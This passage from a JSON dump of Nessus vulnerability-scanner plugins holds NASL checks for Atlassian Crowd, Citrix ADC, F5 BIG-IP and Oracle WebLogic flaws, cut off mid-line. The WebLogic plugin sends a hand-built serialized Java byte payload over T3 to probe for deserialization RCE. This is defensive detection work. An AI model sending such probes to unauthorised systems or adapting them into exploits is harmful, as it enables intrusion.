script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-11580\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Atlassian Crowd pdkinstall Unauthenticated Plugin Upload RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:crowd\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"crowd_detect.nasl\", \"os_fingerprint.nasl\");\n script_require_keys(\"www/crowd\");\n script_require_ports(\"Services/www\", 8095);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\ninclude(\"vcf.inc\");\n\nport = get_http_port(default:8095);\n\napp = \"crowd\";\n\napp_info = vcf::get_app_info(app:app, port:port, webapp:TRUE);\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { \"min_version\" : \"2.1.0\", \"fixed_version\" : \"3.0.5\" },\n { \"min_version\" : \"3.1.0\", \"fixed_version\" : \"3.1.6\" },\n { \"min_version\" : \"3.2.0\", \"fixed_version\" : \"3.2.8\" },\n { \"min_version\" : \"3.3.0\", \"fixed_version\" : \"3.3.5\" },\n { \"min_version\" : \"3.4.0\", \"fixed_version\" : \"3.4.4\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-23T14:53:10", "description": "The version of Citrix ADC or Citrix NetScaler Gateway SSL VPN running on the remote web server is affected by an authorization bypass vulnerability. An unauthenticated remote attacker with access to the NSIP/management interface can exploit this to bypass authorization.\n\nPlease refer to advisory CTX276688 for more information.", "cvss3": {"score": 6.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"}, "published": "2020-07-30T00:00:00", "type": "nessus", "title": "Citrix ADC and Citrix NetScaler Gateway Multiple Vulnerabilities (CTX276688) (Direct Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-8193"], "modified": "2022-07-19T00:00:00", "cpe": ["cpe:/o:citrix:netscaler_access_gateway_firmware"], "id": "CITRIX_CTX276688_DIRECT_CHECK.NBIN", "href": "https://www.tenable.com/plugins/nessus/139082", "sourceData": "Binary data citrix_CTX276688_direct_check.nbin", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-07-11T16:41:42", "description": "The remote Citrix ADC or Citrix NetScaler Gateway device is version 10.5.x prior to 10.5.70.18, 11.1.x prior to 11.1.64.14, 12.0.x prior to 12.0.63.21, 12.1.x prior to 12.1.57.18 or 13.0.x prior to 13.0.58.30. It is, therefore, affected by multiple vulnerabilities:\n\n - An authorization bypass vulnerability exists in Citrix ADC and NetScaler Gateway devices. An unauthenticated remote attacker with access to the NSIP/management interface can exploit this to bypass authorization. (CVE-2020-8193)\n\n - A code injection vulnerability exists in Citrix ADC and NetScaler Gateway devices. An unauthenticated remote attacker with access to the NSIP/management interface can exploit this to create a malicious file which, if executed by a victim on the management network, could allow the attacker arbitrary code execution in the context of that user. (CVE-2020-8194)\n\n - A cross-site scripting vulnerability exists in Citrix ADC and NetScaler Gateway devices. An unauthenticated remote attacker can exploit this convincing a user to click a specially crafted URL, to execute arbitrary script code in a user's browser session. (CVE-2020-8191, CVE-2020-8198)\n\nIn addition, Citrix ADC and Citrix NetScaler Gateway are also affected by several additional vulnerabilities including configuration-dependent privilege escalations, information disclosures, and a denial of service vulnerability. \n\nPlease refer to advisory CTX276688 for more information.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-07-08T00:00:00", "type": "nessus", "title": "Citrix ADC and Citrix NetScaler Gateway Multiple Vulnerabilities (CTX276688)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-18177", "CVE-2020-8187", "CVE-2020-8190", "CVE-2020-8191", "CVE-2020-8193", "CVE-2020-8194", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8197", "CVE-2020-8198", "CVE-2020-8199"], "modified": "2022-01-21T00:00:00", "cpe": ["cpe:2.3:h:citrix:netscaler_gateway:*:*:*:*:*:*:*:*", "cpe:2.3:h:citrix:netscaler_application_delivery_controller:*:*:*:*:*:*:*:*"], "id": "CITRIX_NETSCALER_CTX276688.NASL", "href": "https://www.tenable.com/plugins/nessus/138212", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138212);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/21\");\n\n script_cve_id(\n \"CVE-2019-18177\",\n \"CVE-2020-8187\",\n \"CVE-2020-8190\",\n \"CVE-2020-8191\",\n \"CVE-2020-8193\",\n \"CVE-2020-8194\",\n \"CVE-2020-8195\",\n \"CVE-2020-8196\",\n \"CVE-2020-8197\",\n \"CVE-2020-8198\",\n \"CVE-2020-8199\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0286-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Citrix ADC and Citrix NetScaler Gateway Multiple Vulnerabilities (CTX276688)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Citrix ADC or Citrix NetScaler Gateway device is version 10.5.x prior to 10.5.70.18, 11.1.x prior to \n11.1.64.14, 12.0.x prior to 12.0.63.21, 12.1.x prior to 12.1.57.18 or 13.0.x prior to 13.0.58.30. It is, therefore, \naffected by multiple vulnerabilities:\n\n - An authorization bypass vulnerability exists in Citrix ADC and NetScaler Gateway devices. An \n unauthenticated remote attacker with access to the NSIP/management interface can exploit this to bypass \n authorization. (CVE-2020-8193)\n\n - A code injection vulnerability exists in Citrix ADC and NetScaler Gateway devices. An unauthenticated \n remote attacker with access to the NSIP/management interface can exploit this to create a malicious file\n which, if executed by a victim on the management network, could allow the attacker arbitrary code execution\n in the context of that user. (CVE-2020-8194)\n\n - A cross-site scripting vulnerability exists in Citrix ADC and NetScaler Gateway devices. An\n unauthenticated remote attacker can exploit this convincing a user to click a specially crafted URL, to \n execute arbitrary script code in a user's browser session. (CVE-2020-8191, CVE-2020-8198)\n\nIn addition, Citrix ADC and Citrix NetScaler Gateway are also affected by several additional vulnerabilities including \nconfiguration-dependent privilege escalations, information disclosures, and a denial of service vulnerability. \n\nPlease refer to advisory CTX276688 for more information.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.citrix.com/article/CTX276688\");\n script_set_attribute(attribute:\"solution\", value:\n\"For versions 10.5.x, 11.1.x, 12.0.x, 12.1.x and 13.0.x, upgrade to 10.5.70.18, 11.1.64.14, 12.0.63.21, 12.1.57.18 and \n13.0.58.30, or later, respectively.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-8197\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:citrix:netscaler_gateway\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:citrix:netscaler_application_delivery_controller\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"citrix_netscaler_detect.nbin\");\n script_require_keys(\"Host/NetScaler/Detected\");\n\n exit(0);\n}\ninclude('vcf_extras_netscaler.inc');\n\nvar app_info = vcf::citrix_netscaler::get_app_info();\n\nvar constraints = [\n {'min_version': '10.5', 'fixed_version': '10.5.70.18', 'fixed_display': '10.5-70.18'},\n {'min_version': '11.1', 'fixed_version': '11.1.64.14', 'fixed_display': '11.1-64.14'},\n {'min_version': '12.0', 'fixed_version': '12.0.63.21', 'fixed_display': '12.0-63.21'},\n {'min_version': '12.1', 'fixed_version': '12.1.57.18', 'fixed_display': '12.1-57.18'},\n {'min_version': '13.0', 'fixed_version': '13.0.58.30', 'fixed_display': '13.0-58.30'}\n];\n\nvcf::citrix_netscaler::check_version_and_report(\n app_info: app_info,\n constraints: constraints,\n severity: SECURITY_WARNING\n);\n", "cvss": {"score": 6.5, "vector": "CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-06-16T14:57:25", "description": "CVE-2015-4852 Java applications that have an endpoint that accepts serialized Java objects, an attacker can combine serializable collections to create arbitrary remote code execution. Based on the FoxGlove, an attack can be done via RMI or HTTP. The vulnerability is actually in InvokerTransformer class. If class path exists for commons-collections or commons-collections4, the vulnerability exits in the application.\n\nApache Collections-580 - Arbitrary remote code execution with InvokerTransformer With InvokerTransformer, serializable collections can be build that execute arbitrary Java code.\nsun.reflect.annotation.AnnotationInvocationHandler#readObject invokes #entrySet and #get on a deserialized collection. If you have an endpoint that accepts serialized Java objects (JMX, RMI, remote EJB, ...) you can combine the two to create arbitrary remote code execution vulnerability.", "cvss3": {"score": null, "vector": null}, "published": "2015-12-17T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : Java commons-collections library vulnerability (K30518307)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-4852"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/a:f5:big-ip_access_policy_manager", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/a:f5:big-ip_wan_optimization_manager", "cpe:/a:f5:big-ip_webaccelerator", "cpe:/h:f5:big-ip", "cpe:/h:f5:big-ip_protocol_security_manager"], "id": "F5_BIGIP_SOL30518307.NASL", "href": "https://www.tenable.com/plugins/nessus/87432", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K30518307.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(87432);\n script_version(\"2.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2015-4852\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"F5 Networks BIG-IP : Java commons-collections library vulnerability (K30518307)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"CVE-2015-4852 Java applications that have an endpoint that accepts\nserialized Java objects, an attacker can combine serializable\ncollections to create arbitrary remote code execution. Based on the\nFoxGlove, an attack can be done via RMI or HTTP. The vulnerability is\nactually in InvokerTransformer class. If class path exists for\ncommons-collections or commons-collections4, the vulnerability exits\nin the application.\n\nApache Collections-580 - Arbitrary remote code execution with\nInvokerTransformer With InvokerTransformer, serializable collections\ncan be build that execute arbitrary Java code.\nsun.reflect.annotation.AnnotationInvocationHandler#readObject invokes\n#entrySet and #get on a deserialized collection. If you have an\nendpoint that accepts serialized Java objects (JMX, RMI, remote EJB,\n...) you can combine the two to create arbitrary remote code execution\nvulnerability.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://issues.apache.org/jira/browse/COLLECTIONS-580\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K30518307\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution K30518307.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Oracle Weblogic Server Deserialization RCE - Raw Object');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/11/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"K30518307\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# AFM\nvmatrix[\"AFM\"] = make_array();\nvmatrix[\"AFM\"][\"affected\" ] = make_list(\"12.0.0\",\"11.3.0-11.6.1\");\nvmatrix[\"AFM\"][\"unaffected\"] = make_list(\"12.1.0\");\n\n# AM\nvmatrix[\"AM\"] = make_array();\nvmatrix[\"AM\"][\"affected\" ] = make_list(\"12.0.0\",\"11.4.0-11.6.1\");\nvmatrix[\"AM\"][\"unaffected\"] = make_list(\"12.1.0\");\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"12.0.0\",\"11.0.0-11.6.1\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"12.1.0\",\"10.1.0-10.2.4\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"12.0.0\",\"11.0.0-11.6.1\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"12.1.0\",\"10.1.0-10.2.4\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"12.0.0\",\"11.0.0-11.6.1\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"12.1.0\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"11.0.0-11.6.1\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"10.1.0-10.2.4\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"12.0.0\",\"11.0.0-11.6.1\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"12.1.0\",\"10.1.0-10.2.4\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"12.0.0\",\"11.0.0-11.6.1\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"12.1.0\",\"10.1.0-10.2.4\");\n\n# PEM\nvmatrix[\"PEM\"] = make_array();\nvmatrix[\"PEM\"][\"affected\" ] = make_list(\"12.0.0\",\"11.3.0-11.6.1\");\nvmatrix[\"PEM\"][\"unaffected\"] = make_list(\"12.1.0\");\n\n# PSM\nvmatrix[\"PSM\"] = make_array();\nvmatrix[\"PSM\"][\"affected\" ] = make_list(\"11.0.0-11.4.1\");\nvmatrix[\"PSM\"][\"unaffected\"] = make_list(\"10.1.0-10.2.4\");\n\n# WAM\nvmatrix[\"WAM\"] = make_array();\nvmatrix[\"WAM\"][\"affected\" ] = make_list(\"11.0.0-11.3.0\");\nvmatrix[\"WAM\"][\"unaffected\"] = make_list(\"10.1.0-10.2.4\");\n\n# WOM\nvmatrix[\"WOM\"] = make_array();\nvmatrix[\"WOM\"][\"affected\" ] = make_list(\"11.0.0-11.3.0\");\nvmatrix[\"WOM\"][\"unaffected\"] = make_list(\"10.1.0-10.2.4\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_hole(port:0, extra:bigip_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-16T14:55:08", "description": "The remote Oracle WebLogic server is affected by a remote code execution vulnerability in the WLS Security component due to unsafe deserialize calls of unauthenticated Java objects to the Apache Commons Collections (ACC) library. An unauthenticated, remote attacker can exploit this to execute arbitrary Java code in the context of the WebLogic server.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-11-23T00:00:00", "type": "nessus", "title": "Oracle WebLogic Java Object Deserialization RCE", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-4852"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:oracle:weblogic_server"], "id": "WEBLOGIC_2015_4852.NASL", "href": "https://www.tenable.com/plugins/nessus/87011", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87011);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2015-4852\");\n script_bugtraq_id(77539);\n script_xref(name:\"CERT\", value:\"576313\");\n script_xref(name:\"IAVA\", value:\"2015-A-0287\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Oracle WebLogic Java Object Deserialization RCE\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle WebLogic server is affected by a remote code\nexecution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle WebLogic server is affected by a remote code\nexecution vulnerability in the WLS Security component due to unsafe\ndeserialize calls of unauthenticated Java objects to the Apache\nCommons Collections (ACC) library. An unauthenticated, remote attacker\ncan exploit this to execute arbitrary Java code in the context of the\nWebLogic server.\");\n # https://www.oracle.com/technetwork/topics/security/alert-cve-2015-4852-2763333.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e0203be3\");\n # https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9c6d83db\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in the vendor\nadvisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-4852\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Oracle Weblogic Server Deserialization RCE - Raw Object');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/11/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:weblogic_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"weblogic_detect.nasl\", \"t3_detect.nasl\");\n script_require_ports(\"Services/t3\", 7001);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"t3.inc\");\n\nappname = \"Oracle WebLogic Server\";\n\nport = get_service(svc:'t3', default:7001, exit_on_fail:TRUE);\n\n# Try to talk T3 to the server\nsock = open_sock_tcp(port);\nif (!sock) audit(AUDIT_SOCK_FAIL, port);\nversion = t3_connect(sock:sock, port:port);\n\n# send ident so we can move on to login\nt3_send_ident_request(sock:sock, port:port);\n\n# send our \"login request\"\nauth_request = '\\x05\\x65\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x1b\\x00\\x00\\x00\\x5d\\x01\\x01\\x00\\x73\\x72\\x01\\x78\\x70\\x73\\x72\\x02\\x78\\x70\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x75\\x72\\x03\\x78\\x70\\x00\\x00\\x00\\x00\\x78\\x74\\x00\\x08\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x75\\x72\\x04\\x78\\x70\\x00\\x00\\x00\\x0c\\x9c\\x97\\x9a\\x9a\\x8c\\x9a\\x9b\\xcf\\xcf\\x9b\\x93\\x9a\\x74\\x00\\x08\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x06\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1d\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x43\\x6c\\x61\\x73\\x73\\x54\\x61\\x62\\x6c\\x65\\x45\\x6e\\x74\\x72\\x79\\x2f\\x52\\x65\\x81\\x57\\xf4\\xf9\\xed\\x0c\\x00\\x00\\x78\\x70\\x72\\x00\\x02\\x5b\\x42\\xac\\xf3\\x17\\xf8\\x06\\x08\\x54\\xe0\\x02\\x00\\x00\\x78\\x70\\x77\\x02\\x00\\x00\\x78\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1d\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x43\\x6c\\x61\\x73\\x73\\x54\\x61\\x62\\x6c\\x65\\x45\\x6e\\x74\\x72\\x79\\x2f\\x52\\x65\\x81\\x57\\xf4\\xf9\\xed\\x0c\\x00\\x00\\x78\\x70\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x90\\xce\\x58\\x9f\\x10\\x73\\x29\\x6c\\x02\\x00\\x00\\x78\\x70\\x77\\x02\\x00\\x00\\x78\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1d\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x43\\x6c\\x61\\x73\\x73\\x54\\x61\\x62\\x6c\\x65\\x45\\x6e\\x74\\x72\\x79\\x2f\\x52\\x65\\x81\\x57\\xf4\\xf9\\xed\\x0c\\x00\\x00\\x78\\x70\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x56\\x65\\x63\\x74\\x6f\\x72\\xd9\\x97\\x7d\\x5b\\x80\\x3b\\xaf\\x01\\x03\\x00\\x03\\x49\\x00\\x11\\x63\\x61\\x70\\x61\\x63\\x69\\x74\\x79\\x49\\x6e\\x63\\x72\\x65\\x6d\\x65\\x6e\\x74\\x49\\x00\\x0c\\x65\\x6c\\x65\\x6d\\x65\\x6e\\x74\\x43\\x6f\\x75\\x6e\\x74\\x5b\\x00\\x0b\\x65\\x6c\\x65\\x6d\\x65\\x6e\\x74\\x44\\x61\\x74\\x61\\x74\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x78\\x70\\x77\\x02\\x00\\x00\\x78\\xfe\\x01\\x00\\x00';\n# this is an org.apache.commons.collections.functors.ConstantTransforms object\n# that is part of the deserialization blacklist.\nauth_request += 